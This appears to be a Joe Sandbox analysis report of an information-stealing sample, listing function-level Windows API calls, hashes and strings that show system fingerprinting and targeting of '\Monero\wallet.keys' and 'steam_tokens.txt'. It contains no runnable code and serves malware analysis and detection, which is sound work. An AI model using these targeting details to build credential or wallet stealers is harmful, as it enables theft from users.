Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 55328ea649636541746dce3e879427fe14efcfbc5cc3fdbb1f03533bbc34fe6d
Instruction ID: 38026aa2db1458117ff60b36f88c55f3e9e6a8974026ac0809b1d4bdb8e551e2
Opcode Fuzzy Hash: 55328ea649636541746dce3e879427fe14efcfbc5cc3fdbb1f03533bbc34fe6d
Instruction Fuzzy Hash: 2B0162B1945204EBD710DF94ED49FAFFBB8F704B11F10421AEA45A2280C77459048BA1

Function 6C653060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C653095

Part of subcall function 6C6535A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6DF688,00001000), ref: 6C6535D5
Part of subcall function 6C6535A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6535E0
Part of subcall function 6C6535A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C6535FD
Part of subcall function 6C6535A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C65363F
Part of subcall function 6C6535A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C65369F
Part of subcall function 6C6535A0: __aulldiv.LIBCMT ref: 6C6536E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C65309F

Part of subcall function 6C675B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C6756EE,?,00000001), ref: 6C675B85
Part of subcall function 6C675B50: EnterCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675B90
Part of subcall function 6C675B50: LeaveCriticalSection.KERNEL32(6C6DF688,?,?,?,6C6756EE,?,00000001), ref: 6C675BD8
Part of subcall function 6C675B50: GetTickCount64.KERNEL32 ref: 6C675BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C6530BE

Part of subcall function 6C6530F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C653127
Part of subcall function 6C6530F0: __aulldiv.LIBCMT ref: 6C653140

Part of subcall function 6C68AB2A: __onexit.LIBCMT ref: 6C68AB30

Memory Dump Source

Source File: 00000000.00000002.2287629466.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2287614774.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287675325.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287696053.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2287712647.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction ID: 7e821f3c6f95d7c1e9a327f8a3053eed9933defdbf171d57371cc51e0863054d
Opcode Fuzzy Hash: 0e0cdc154a02b5a123ad75d305439fadaf1b84d046cf834c0b44f7394be4601c
Instruction Fuzzy Hash: 48F0D612D2078896CB10DF7588911A6B370AF6F114F545729F84463A61FB2071E883DE

Function 00059470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00059484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 000594A5
CloseHandle.KERNEL32(00000000), ref: 000594AF

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: aad50c11d728b3db93015dbe69321a52d29829c94e8ed78f5285adf52281b530
Instruction ID: 8f20a8eb4486dc2054d512a786b89375e921bd3380585177be85ea493f3419a5
Opcode Fuzzy Hash: aad50c11d728b3db93015dbe69321a52d29829c94e8ed78f5285adf52281b530
Instruction Fuzzy Hash: BFF0307890020CEBEB04DF94DC4EFEE7774EB08301F004554BA0957190DAB05E85CB91

Function 00041110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0004112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00041132
ExitProcess.KERNEL32 ref: 00041143

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: d593bffdef9ae650463a6ccbf0481ecc1f979b710f78c796c18013704bf495f7
Instruction ID: d53b43f299ece27bc1c5d1fdbc7372f3f44f5473ddb936d8738f4d05188570c8
Opcode Fuzzy Hash: d593bffdef9ae650463a6ccbf0481ecc1f979b710f78c796c18013704bf495f7
Instruction Fuzzy Hash: D1E0E6B4946308FBF750ABA0AC0EB4D76B8AF04B41F104055F709765D0DAB52640979A

Function 00051A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 00057500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00057542
Part of subcall function 00057500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0005757F
Part of subcall function 00057500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00057603
Part of subcall function 00057500: RtlAllocateHeap.NTDLL(00000000), ref: 0005760A

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

Part of subcall function 00057690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000576A4
Part of subcall function 00057690: RtlAllocateHeap.NTDLL(00000000), ref: 000576AB

Part of subcall function 000577C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0005DBC0,000000FF,?,00051C99,00000000,?,00CED4D0,00000000,?), ref: 000577F2
Part of subcall function 000577C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0005DBC0,000000FF,?,00051C99,00000000,?,00CED4D0,00000000,?), ref: 000577F9

Part of subcall function 00057850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000411B7), ref: 00057880
Part of subcall function 00057850: RtlAllocateHeap.NTDLL(00000000), ref: 00057887
Part of subcall function 00057850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0005789F

Part of subcall function 000578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00057910
Part of subcall function 000578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00057917
Part of subcall function 000578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0005792F

Part of subcall function 00057980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00060E00,00000000,?), ref: 000579B0
Part of subcall function 00057980: RtlAllocateHeap.NTDLL(00000000), ref: 000579B7
Part of subcall function 00057980: GetLocalTime.KERNEL32(?,?,?,?,?,00060E00,00000000,?), ref: 000579C4
Part of subcall function 00057980: wsprintfA.USER32 ref: 000579F3

Part of subcall function 00057A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00CEEE30,00000000,?,00060E10,00000000,?,00000000,00000000), ref: 00057A63
Part of subcall function 00057A30: RtlAllocateHeap.NTDLL(00000000), ref: 00057A6A
Part of subcall function 00057A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00CEEE30,00000000,?,00060E10,00000000,?,00000000,00000000,?), ref: 00057A7D

Part of subcall function 00057B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00CEEE30,00000000,?,00060E10,00000000,?,00000000,00000000), ref: 00057B35

Part of subcall function 00057B90: GetKeyboardLayoutList.USER32(00000000,00000000,000605AF), ref: 00057BE1
Part of subcall function 00057B90: LocalAlloc.KERNEL32(00000040,?), ref: 00057BF9
Part of subcall function 00057B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00057C0D
Part of subcall function 00057B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00057C62
Part of subcall function 00057B90: LocalFree.KERNEL32(00000000), ref: 00057D22

Part of subcall function 00057D80: GetSystemPowerStatus.KERNEL32(?), ref: 00057DAD

GetCurrentProcessId.KERNEL32(00000000,?,00CED2D0,00000000,?,00060E24,00000000,?,00000000,00000000,?,00CEECC8,00000000,?,00060E20,00000000), ref: 0005207E

Part of subcall function 00059470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00059484
Part of subcall function 00059470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 000594A5
Part of subcall function 00059470: CloseHandle.KERNEL32(00000000), ref: 000594AF

Part of subcall function 00057E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00057E37
Part of subcall function 00057E00: RtlAllocateHeap.NTDLL(00000000), ref: 00057E3E
Part of subcall function 00057E00: RegOpenKeyExA.KERNEL32(80000002,00CDB6D0,00000000,00020119,?), ref: 00057E5E
Part of subcall function 00057E00: RegQueryValueExA.KERNEL32(?,00CED590,00000000,00000000,000000FF,000000FF), ref: 00057E7F
Part of subcall function 00057E00: RegCloseKey.ADVAPI32(?), ref: 00057E92

Part of subcall function 00057F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00057FC9
Part of subcall function 00057F60: GetLastError.KERNEL32 ref: 00057FD8

Part of subcall function 00057ED0: GetSystemInfo.KERNEL32(00060E2C), ref: 00057F00
Part of subcall function 00057ED0: wsprintfA.USER32 ref: 00057F16

Part of subcall function 00058100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00CEED40,00000000,?,00060E2C,00000000,?,00000000), ref: 00058130
Part of subcall function 00058100: RtlAllocateHeap.NTDLL(00000000), ref: 00058137
Part of subcall function 00058100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00058158
Part of subcall function 00058100: __aulldiv.LIBCMT ref: 00058172
Part of subcall function 00058100: __aulldiv.LIBCMT ref: 00058180
Part of subcall function 00058100: wsprintfA.USER32 ref: 000581AC

Part of subcall function 000587C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00060E28,00000000,?), ref: 0005882F
Part of subcall function 000587C0: RtlAllocateHeap.NTDLL(00000000), ref: 00058836
Part of subcall function 000587C0: wsprintfA.USER32 ref: 00058850

Part of subcall function 00058320: RegOpenKeyExA.KERNEL32(00000000,00CEAF38,00000000,00020019,00000000,000605B6), ref: 000583A4

Part of subcall function 00058320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00058426
Part of subcall function 00058320: wsprintfA.USER32 ref: 00058459
Part of subcall function 00058320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0005847B
Part of subcall function 00058320: RegCloseKey.ADVAPI32(00000000), ref: 0005848C
Part of subcall function 00058320: RegCloseKey.ADVAPI32(00000000), ref: 00058499

Part of subcall function 00058680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000605B7), ref: 000586CA
Part of subcall function 00058680: Process32First.KERNEL32(?,00000128), ref: 000586DE
Part of subcall function 00058680: Process32Next.KERNEL32(?,00000128), ref: 000586F3
Part of subcall function 00058680: CloseHandle.KERNEL32(?), ref: 00058761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0005265B

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 3113730047-0
Opcode ID: 290daaea7673d14af3cbaeef92e13caf72b48dd4d8a447ad6b7a2fe10f3b3f1f
Instruction ID: 27656a7bc86ed64ee5712acbe011dc9fa7cd784552b0785b38fbdae0fcccef81
Opcode Fuzzy Hash: 290daaea7673d14af3cbaeef92e13caf72b48dd4d8a447ad6b7a2fe10f3b3f1f
Instruction Fuzzy Hash: 1E723C72D14118AADB19FB90EC96EEF7338AF15301F5043AAB91666053EF302B4DCB65

Function 00046D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3875e08fc6edf177f9fbd2e2480dc4008a16e1a9a3ef4d1dea92edb7a4d30596
Instruction ID: d97887f0d68260e7263819b548c1b72e891c35850b33e20f2cece873661b4988
Opcode Fuzzy Hash: 3875e08fc6edf177f9fbd2e2480dc4008a16e1a9a3ef4d1dea92edb7a4d30596
Instruction Fuzzy Hash: A06119F4D00218EFDB14CF94E944BEEB7B0BB05304F1085A8E81967281E776AE94DF96

Function 00055100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A820: lstrlen.KERNEL32(00044F05,?,?,00044F05,00060DDE), ref: 0005A82B
Part of subcall function 0005A820: lstrcpy.KERNEL32(00060DDE,00000000), ref: 0005A885

lstrlen.KERNEL32(00000000,00000000,00060ACA), ref: 0005512A

Strings

steam_tokens.txt, xrefs: 0005513F

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 17eb2081f1697e533a49530c5b943380c8a799225f81e1b5b53b5c3c102ff0d5
Instruction ID: 3faee58f925a4dbcc89fc1ec6f0a21660849d3aa14d869a75855e3d0aa60aadd
Opcode Fuzzy Hash: 17eb2081f1697e533a49530c5b943380c8a799225f81e1b5b53b5c3c102ff0d5
Instruction Fuzzy Hash: 02F01971A10108A6DB04FBB0EC579FE773CAF55301F804268BC1666493EF246A0DC7A7

Function 00057ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00060E2C), ref: 00057F00
wsprintfA.USER32 ref: 00057F16

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
